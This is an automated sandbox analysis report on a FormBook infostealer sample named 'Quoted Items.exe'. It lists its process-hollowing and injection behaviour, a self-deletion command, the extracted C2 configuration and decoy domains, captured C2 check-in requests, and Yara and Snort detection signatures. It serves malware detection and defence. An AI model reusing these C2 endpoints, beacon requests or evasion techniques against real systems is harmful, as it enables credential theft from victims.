Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quoted Items.exe

Overview

General Information

Sample Name:Quoted Items.exe
Analysis ID:626564
MD5:901567a408d891fc0f67e15221d1b7e4
SHA1:dba16ac8c7523f640494843471a5f9d4fb211bef
SHA256:70c9cf50b937cdf3015d4e7fdffbe1c8ab4820eaca74c7373f0760fa905a494a
Tags:exexloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Quoted Items.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\Quoted Items.exe" MD5: 901567A408D891FC0F67E15221D1B7E4)
    • Quoted Items.exe (PID: 6688 cmdline: C:\Users\user\Desktop\Quoted Items.exe MD5: 901567A408D891FC0F67E15221D1B7E4)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 612 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6552 cmdline: /c del "C:\Users\user\Desktop\Quoted Items.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gulabmonga.com/gfge/"], "decoy": ["loopcoalition.com", "hd126.com", "elioguion.net", "defitrader.academy", "exactemi.com", "angeloacierno.com", "range4tis.com", "ilovekuduro.us", "mydealsstation.com", "jerichoprinting.com", "birdcafe605.com", "freemansrepublic.com", "driedplasma.com", "valuableconnect.com", "anthonyvid.xyz", "theydo.support", "devnetsecops.com", "cryptork.tech", "ufheur678.store", "lavenderspa586.com", "scandicinvestmentholding.com", "youenfangtex.com", "gratefulgrandmas.com", "ampersandtalent.net", "wippychick.com", "stamping.digital", "trixes.net", "popinticket.com", "ivyleaguereading.com", "killerinktnpasumo3.xyz", "greatyuwx.com", "royaltortoisecookieco.online", "quinten-and-sam.com", "mobile-sh.com", "reacjs.com", "hongbufang.net", "winemenuimports.com", "nashuatelegrpah.com", "nicorgaa.com", "outlanfd.com", "personalitideal.com", "mhhj666.com", "themethodcollective.com", "36536a.com", "bijit.xyz", "yoursinsoccer.net", "cryptoducks.club", "defuw.com", "kangley.net", "hacvm.com", "zhouyihong.top", "takut5.com", "kreditnekarticers.com", "koigo-wp.com", "52byhx.com", "phaghpanah.com", "apqlds.com", "karxsba2ix.xyz", "demasinfimo.quest", "unitytrstbnk.com", "panasonic-hcm.com", "27530amethystway.com", "idealftz.xyz", "conventionline.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.Quoted Items.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.Quoted Items.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.Quoted Items.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Quoted Items.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.Quoted Items.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.38.8.8.851518532023883 05/14/22-13:13:06.533808
          SID:2023883
          Source Port:51518
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.3209.17.116.16349806802031412 05/14/22-13:12:56.292892
          SID:2031412
          Source Port:49806
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3209.17.116.16349806802031449 05/14/22-13:12:56.292892
          SID:2031449
          Source Port:49806
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3209.17.116.16349806802031453 05/14/22-13:12:56.292892
          SID:2031453
          Source Port:49806
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.gulabmonga.com/gfge/"], "decoy": ["loopcoalition.com", "hd126.com", "elioguion.net", "defitrader.academy", "exactemi.com", "angeloacierno.com", "range4tis.com", "ilovekuduro.us", "mydealsstation.com", "jerichoprinting.com", "birdcafe605.com", "freemansrepublic.com", "driedplasma.com", "valuableconnect.com", "anthonyvid.xyz", "theydo.support", "devnetsecops.com", "cryptork.tech", "ufheur678.store", "lavenderspa586.com", "scandicinvestmentholding.com", "youenfangtex.com", "gratefulgrandmas.com", "ampersandtalent.net", "wippychick.com", "stamping.digital", "trixes.net", "popinticket.com", "ivyleaguereading.com", "killerinktnpasumo3.xyz", "greatyuwx.com", "royaltortoisecookieco.online", "quinten-and-sam.com", "mobile-sh.com", "reacjs.com", "hongbufang.net", "winemenuimports.com", "nashuatelegrpah.com", "nicorgaa.com", "outlanfd.com", "personalitideal.com", "mhhj666.com", "themethodcollective.com", "36536a.com", "bijit.xyz", "yoursinsoccer.net", "cryptoducks.club", "defuw.com", "kangley.net", "hacvm.com", "zhouyihong.top", "takut5.com", "kreditnekarticers.com", "koigo-wp.com", "52byhx.com", "phaghpanah.com", "apqlds.com", "karxsba2ix.xyz", "demasinfimo.quest", "unitytrstbnk.com", "panasonic-hcm.com", "27530amethystway.com", "idealftz.xyz", "conventionline.com"]}
          Multi AV Scanner detection for submitted file
          Source: Quoted Items.exeVirustotal: Detection: 44%Perma Link
          Source: Quoted Items.exeReversingLabs: Detection: 48%
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.gratefulgrandmas.com/gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83pAvira URL Cloud: Label: malware
          Source: www.gulabmonga.com/gfge/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Quoted Items.exeJoe Sandbox ML: detected
          Source: 4.0.Quoted Items.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.Quoted Items.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.Quoted Items.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.Quoted Items.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Quoted Items.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Quoted Items.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: AuthorizationRuleCollect.pdb source: Quoted Items.exe
          Source: Binary string: wntdll.pdbUGP source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.zhouyihong.top
          Source: C:\Windows\explorer.exeNetwork Connect: 180.76.158.103 80
          Source: C:\Windows\explorer.exeDomain query: www.gratefulgrandmas.com
          Source: C:\Windows\explorer.exeDomain query: www.royaltortoisecookieco.online
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49806 -> 209.17.116.163:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49806 -> 209.17.116.163:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49806 -> 209.17.116.163:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51518 -> 8.8.8.8:53
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.gulabmonga.com/gfge/
          Source: Joe Sandbox ViewASN Name: BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd
          Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
          Source: global trafficHTTP traffic detected: GET /gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk HTTP/1.1Host: www.royaltortoisecookieco.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p HTTP/1.1Host: www.gratefulgrandmas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.17.116.163 209.17.116.163
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Quoted Items.exe, 00000000.00000002.290407934.00000000070A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmstp.exe, 00000010.00000002.515589194.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515718507.00000000033FF000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.515691938.00000000033F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhouyihong.top/gfge/?-ZEhG=0pO83p&atm=sEHQRf3BqyQO1Td3JS1wynh19DI9TXEUdP6kOjRf7qywa0JEaIf
          Source: cmstp.exe, 00000010.00000002.517155525.0000000005762000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gratitudeaddict.com/
          Source: unknownDNS traffic detected: queries for: www.royaltortoisecookieco.online
          Source: global trafficHTTP traffic detected: GET /gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk HTTP/1.1Host: www.royaltortoisecookieco.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p HTTP/1.1Host: www.gratefulgrandmas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
